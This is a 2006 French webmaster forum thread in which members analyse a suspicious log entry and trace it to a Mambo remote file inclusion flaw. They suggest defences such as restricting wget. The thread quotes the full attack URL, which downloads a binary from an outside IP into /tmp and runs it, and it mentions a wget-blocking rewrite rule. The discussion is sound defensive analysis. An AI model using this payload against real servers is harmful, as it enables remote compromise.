Régis Posté 25 Février 2006 Partager Posté 25 Février 2006 (modifié) Bonjour, En regardant les stats d'un de mes sites, j'ai vu plusieurs accès direct via ce code : http://xxx.xxx.xxx.xxx/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://219.84.105.36/cmd.gif?&cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./sup NB : j'ai scindé la requête pour qu'elle puisse rentrée dans le post, mais il s'agit bien d'une seule et unique ligne... L'adresse IP du site en question a été remplacé par des xxx : il s'agit du site de mon entreprise. La seconde IP m'est inconnu... Quand on colle cette ligne dans la barre d'adresse du navigateur, on tombe directement sur le site de mon entreprise... Quelqu'un peut-il m'expliquer à quoi corresponds cette entrée bizarre (code après le index.php) ? Merci Modifié 25 Février 2006 par gatcweb Lien vers le commentaire Partager sur d’autres sites More sharing options...
Théo B. Posté 25 Février 2006 Partager Posté 25 Février 2006 (modifié) Il s'agit à mon avis d'une tentative de hack. Trouve l'ip dans tes logs et regarde d'où ça vient. //EDIT : D'après l'ip "219.84.105.36" que tu as dans tes stats ça viendrait de Taiwan... Modifié 25 Février 2006 par Théo B. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Régis Posté 25 Février 2006 Auteur Partager Posté 25 Février 2006 Il s'agit à mon avis d'une tentative de hack.Trouve l'ip dans tes logs et regarde d'où ça vient. Je pense aussi. Je viens de faire une requête sur GG : com_content&do_pdf et j'ai bien l'impression qu'il s'agit de spam... A votre avis... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 25 Février 2006 Partager Posté 25 Février 2006 Le plus inquiétant est l'appel de wget... il télécharge un programme en provenance de son serveur et tente de l'exécuter chez toi. Ce n'est vraisemblablement pas du spam mais une tentative d'intrusion, comme le montre cette partie de l'URL: &cmd=cd%20/tmp;wget%20219.84.105.36/supina;chmod%20744%20supina;./sup à laquelle il doit manquer la fin ... Si tu es sur un serveur dédié, le plus simple est de supprimer le droit d'exécution de wget à l'utilisateur Apache (nobody) Ou encore de lancer une commande "chmod 700 /usr/bin/wget" Dan Lien vers le commentaire Partager sur d’autres sites More sharing options...
Régis Posté 25 Février 2006 Auteur Partager Posté 25 Février 2006 Le plus inquiétant est l'appel de wget... il télécharge un programme en provenance de son serveur et tente de l'exécuter chez toi.Ce n'est vraisemblablement pas du spam mais une tentative d'intrusion. Si tu es sur un serveur dédié, le plus simple est de supprimer le droit d'exécution de wget à l'utilisateur Apache (nobody) Ou encore de lancer une commande "chmod 700 /usr/bin/wget" Merci DAN, Je vois cela avec le responsable "réseau" et mon hébergeur... La 1ère attaque est venu, a priori, de 213.196.223.21. Selon dnsstuff.com : http://www.dnsstuff.com/tools/ip4r.ch?ip=213.196.223.21 ... cela correspondrait à mail.compecon.de Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 25 Février 2006 Partager Posté 25 Février 2006 Une attaque venant d'un serveur de mail ? je ne pense pas... tu as dû te louper dans l'analyse du log. Une simple règle de réécriture et tu te débarrasses de toutes les URLs qui contiennent wget dans la QUERY_STRING Mais il ne faut pas que tu utilises toi-même "wget" dans tes noms ou valeurs de variables... Au moins tu éviteras 95% des tentatives de hack Dan Lien vers le commentaire Partager sur d’autres sites More sharing options...
Régis Posté 25 Février 2006 Auteur Partager Posté 25 Février 2006 Une attaque venant d'un serveur de mail ? je ne pense pas... tu as dû te louper dans l'analyse du log. Ok, je vais revirifier... Une simple règle de réécriture et tu te débarrasses de toutes les URLs qui contiennent wget dans la QUERY_STRING Mais il ne faut pas que tu utilises toi-même "wget" dans tes noms ou valeurs de variables... Au moins tu éviteras 95% des tentatives de hack Nous n'utilisons pas WGET sur le site... Responsable réseau et hébergeur => contactés... Merci DAN... toujours aussi prompt et perspicace... Lien vers le commentaire Partager sur d’autres sites More sharing options...
Jeanluc Posté 25 Février 2006 Partager Posté 25 Février 2006 Bonjour, Vous m'inquiétez... Le risque dont vous parlez est seulement présent si /index.php ne traite pas ces variables avec toute la prudence nécessaire ou je me trompe ? Jean-Luc Lien vers le commentaire Partager sur d’autres sites More sharing options...
Dan Posté 25 Février 2006 Partager Posté 25 Février 2006 Il ne faut pas permettre à un script d'appeler wget, c'est le plus simple. L'exemple plus haut fait vraisemblablement appel à une faille d'un fichier index.php, comme on en trouve souvent dans le forum phpBB. Donc le hacker lance cette ligne de commande (les arguments) en espérant qu'elle soit prise en compte. Mais normalement, un fichier index.php non buggé ne les prendra pas. Donc, pas de risque. Dan Lien vers le commentaire Partager sur d’autres sites More sharing options...
baboon Posté 26 Février 2006 Partager Posté 26 Février 2006 Bonjour a tous, ça y est Régis, me voilà Pour completer le post ....j'ai analyser la requête et fait quelques recherche... "mosConfig_absolute_path" est une variable de Mambo; jusqu'a la version 4.5.2.3 de mambo il y a une faille de sécurité (il existe un patch pour la corriger): Une vulnérabilité a été identifiée dans Mambo, elle pourrait être exploitée par un attaquant distant afin de compromettre un serveur web vulnérable. Le problème résulte d'une erreur présente au niveau de l'émulation "register_globals" dans "globals.php", ce qui pourrait être exploité afin d'inclure un fichier malicieux via la variable "mosConfig_absolute_path" et exécuter des commandes arbitraires avec les privilèges du serveur web.Source ici Je ne pense pas que le site soit visé directement (On n'utilise pas Mambo); je dirais plûtot qu'on cherche a utiliser une machine ou mambo est installé pour faire une attaque par rebond sur une autre cible....à vérifier... Bonne journée à tous Lien vers le commentaire Partager sur d’autres sites More sharing options...
Régis Posté 26 Février 2006 Auteur Partager Posté 26 Février 2006 (modifié) On n'utilise pas Mambo OK merci à toi pour ces infos Baboon... cela est rassurant A toute fin utile pour les utilisateurs de Mambo : sur l'URL que tu as donné => il y a un lien vers un correctif Modifié 26 Février 2006 par gatcweb Lien vers le commentaire Partager sur d’autres sites More sharing options...
suede Posté 27 Février 2006 Partager Posté 27 Février 2006 (modifié) Il ne faut pas permettre à un script d'appeler wget, c'est le plus simple. L'exemple plus haut fait vraisemblablement appel à une faille d'un fichier index.php, comme on en trouve souvent dans le forum phpBB. Donc le hacker lance cette ligne de commande (les arguments) en espérant qu'elle soit prise en compte. Mais normalement, un fichier index.php non buggé ne les prendra pas. Donc, pas de risque. Dan <{POST_SNAPBACK}> C'etait une faille de php en fait si je me souviens bien. Le ver qui l'utilisait etait santy (et s'etait specialisé entre autres sur phpbb mais beaucoup d'autres scripts étaient concernés). Il y a pas mal d'exemple de htaccess pour virer ce ver. Il avait essayé de venir sur mon phpbb mais excepté la conso de bande passante, il n'avait rien pu faire. François Modifié 27 Février 2006 par suede Lien vers le commentaire Partager sur d’autres sites More sharing options...
Sujets conseillés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant